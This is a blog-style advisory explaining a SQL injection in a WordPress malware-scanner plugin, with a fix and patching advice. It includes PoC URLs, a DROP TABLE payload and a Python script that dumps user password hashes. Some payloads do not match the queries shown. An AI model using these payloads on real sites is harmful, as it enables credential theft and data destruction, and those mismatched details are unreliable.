CVE-2024-25902 - Breaking Down the SQL Injection Vulnerability in miniorange Malware Scanner (Vulnerable up to 4.7.2)

In early 2024, a serious SQL Injection bug, tagged as CVE-2024-25902, was discovered in the popular miniorange Malware Scanner — a WordPress plugin known for its malware detection capabilities. If you use the plugin from any version up to 4.7.2, your site could be at serious risk. In this article, we'll explain what happened, show the actual attack methods, provide code snippets, and give you steps to protect yourself.

What is CVE-2024-25902?

CVE-2024-25902 is a vulnerability caused by improper handling (“neutralization”) of special characters in SQL commands. In everyday terms: the plugin takes user input and puts it right into a database query without cleaning it up first — this opens the door for hackers to inject their own malicious code (SQL).

Where’s the Bug?

The vulnerability lives inside the Malware Scanner plugin’s admin area, specifically where it processes user-supplied data to generate or search scan results. The plugin does not properly escape or prepare the data before running it as part of an SQL query.

From the advisory on GitHub Security Advisory

> *“SQL Injection in class-mo-file-scanner.php, improper neutralization of special elements in SQL command, when handling input from admin-side requests.”*

A simplified (but realistic) version of the vulnerable code looks like this

// class-mo-file-scanner.php

$scan_id = $_GET['scan_id']; // Attackers can control this value

// BAD: Direct use in an SQL query without sanitizing or preparing
$query = "SELECT * FROM wp_mo_scans WHERE scan_id = '$scan_id'";

$results = $wpdb->get_results($query);

Anything you put in scan_id will be run directly as part of that SQL command!

Exploiting the Vulnerability: Proof-of-Concept (PoC)

Any authenticated admin user (or anyone with access to the dashboard) can exploit the vulnerability by crafting a malicious request. For demonstration, if you visit:

https://your-wordpress-site.com/wp-admin/admin.php?page=mo_file_scanner&scan_id=1'; OR 1=1 --

The resulting SQL query the plugin runs becomes

SELECT * FROM wp_mo_scans WHERE scan_id = '1' OR 1=1 -- '

Now imagine a more dangerous payload

https://your-wordpress-site.com/wp-admin/admin.php?page=mo_file_scanner&scan_id=';; DROP TABLE wp_users; --

This would result in

SELECT * FROM wp_mo_scans WHERE scan_id = ''; DROP TABLE wp_users; --'

This could potentially *delete* your users table! (Note: Depending on your DB config, multiple statements like this could be blocked, but it shows how dangerous this is.)

Exploit Script Example

Here’s a simple Python script to automate sending a malicious request (assuming you’re authenticated):

import requests

# Change these:
site = 'https://your-wordpress-site.com';
cookies = {'wordpress_logged_in_xxx': 'your-auth-cookie'}

payload = "1' UNION SELECT user_login, user_pass FROM wp_users -- "
params = {
    'page': 'mo_file_scanner',
    'scan_id': payload
}

url = f"{site}/wp-admin/admin.php"

response = requests.get(url, params=params, cookies=cookies)
print(response.text)  # Look for dumped usernames and hashes in the output!

Are You Vulnerable?

- Check What Version You're Running! If you have miniorange Malware Scanner 4.7.2 or below, you are at risk.
- Is Your Site Accessible to Admins Only? This is an authenticated vulnerability, but attackers often phish, use leaked credentials, or exploit other plugins to become admin.

How Did They Fix It?

Developers must *always* sanitize and prepare user input. The fix adds so-called “prepared statements” or at least escaping. Here’s how safe code might look:

// SAFE way:
$scan_id = $_GET['scan_id'];
$query = $wpdb->prepare(
    "SELECT * FROM wp_mo_scans WHERE scan_id = %d", 
    $scan_id
);
$results = $wpdb->get_results($query);

Or, even better, ensure type safety

$scan_id = intval($_GET['scan_id']);

Recommendations

1. Update Plugin Immediately: Check WordPress.org plugin page or the official changelog for updates past 4.7.2.
2. Restrict Admin Access: Always use strong passwords and two-factor authentication for your dashboard.

Stay Informed: Follow advisories from sources like

- GitHub Security Advisory
- WPScan Advisory
- NVD

References & Further Reading

- GHSA-j997-c5q7-29mw (GitHub Security Advisory)
- WPScan Advisory (CVE-2024-25902)
- WordPress Plugin Page (miniorange Malware Scanner)
- NVD Entry for CVE-2024-25902

Conclusion

CVE-2024-25902 is a dangerous SQL injection that could let an attacker do almost anything to your WordPress site running vulnerable versions of the miniorange Malware Scanner plugin. Make sure you patch immediately, follow good security hygiene, and check your plugin versions.

If you run a WordPress site, always keep an eye on security bulletins and never underestimate the impact of a single, poorly-written SQL query!

> *Have questions or need help securing your WordPress site? Comment below or contact a trusted security professional today.*

Timeline

Published on: 02/28/2024 13:15:08 UTC
Last modified on: 02/28/2024 14:06:45 UTC